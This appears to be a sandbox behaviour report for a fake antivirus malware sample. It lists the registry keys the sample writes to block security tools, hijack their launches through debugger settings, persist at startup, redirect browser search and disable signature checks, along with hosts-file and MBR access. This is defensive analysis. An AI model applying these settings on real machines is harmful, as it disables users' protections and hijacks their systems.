Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MSASCui.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "avcenter.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "avgfrw.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "avgcmgr.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "egui.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "avgemc.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\etc\host_new C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Sets file execution options in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\generics.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msblast.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powerscan.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\About.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsserv.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dllcache.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pfwadmin.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSSUI.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install[5].exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vswinperse.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mctool.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webtrap.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wyvernworksfirewall.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\au.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hxdl.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bidserver.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSkPck.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgctrl.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netarmor.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winssk32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zatutor.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDInProcPatch.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto-protect.nav80try.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luspt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\start.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windll32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbcons.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dcomx.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcshell.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ldpro.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan95.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brastk.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msfwsvc.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdsubwiz.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mwatch.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsmain.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ozn695m5.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rav7win.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vet95.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsmon.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccapp.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgtray.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\c.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bd_professional.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perswf.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscfxfw.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssmmc32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pgmonitr.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wimmun32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\win32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmesys.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mu0311ad.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\support.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navnt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\persfw.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avxquar.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qserver.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sh.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\npf40_tw_98_nt_me_2k.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsmain.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\driverctrl.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Internet Security Guard = "\"C:\\ProgramData\\8b93e\\IS978.exe\" /s /d" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Eset\Nod\ C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\PRS = "http://127.0.0.1:27777/?inj=%ORIGINAL%" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\ltHI = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Download\CheckExeSignatures = "no" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\BrowserEmulation C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\IIL = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\ltTST = "15831" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Download\RunInvalidSignatures = "1" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler\ = "Implements DocHostUIHandler" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF} C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32 C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\FAKEAV~1\\INTERN~1.EXE" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Software\Microsoft C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Software\Microsoft\Internet Explorer C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler\Clsid C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "InternetSecurityGuard.DocHostUIHandler" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
